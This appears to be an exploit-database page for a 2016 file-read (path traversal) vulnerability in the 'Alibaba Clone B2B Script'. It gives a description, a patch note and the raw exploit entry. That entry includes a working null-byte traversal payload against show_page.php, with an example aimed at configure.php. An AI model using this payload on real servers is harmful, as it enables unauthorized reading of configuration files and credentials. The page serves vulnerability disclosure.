header-logo
Suggest Exploit
vendor:
Alibaba Clone B2B Script
by:
Meisam Monsef
8,8
CVSS
HIGH
File Read
22
CWE
Product Name: Alibaba Clone B2B Script
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: YES
Related CWE: N/A
CPE: /a:alibaba_clone:alibaba_clone
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS, Windows
2016

Alibaba Clone B2B Script File Read Vulnerability

This vulnerability allows an attacker to read any file on the server. The vulnerability exists due to insufficient sanitization of user-supplied input in the "page" parameter of the "show_page.php" script. A remote attacker can send a specially crafted request to the vulnerable script and read any file on the server.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
# Date: 2016-06-22
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://alibaba-clone.com/
# Version: All Versions
# Tested on: CentOS and Windows

Exploit :
http://site/show_page.php?page=../[FilePath]%00

Example :
http://site/show_page.php?page=../configure.php%00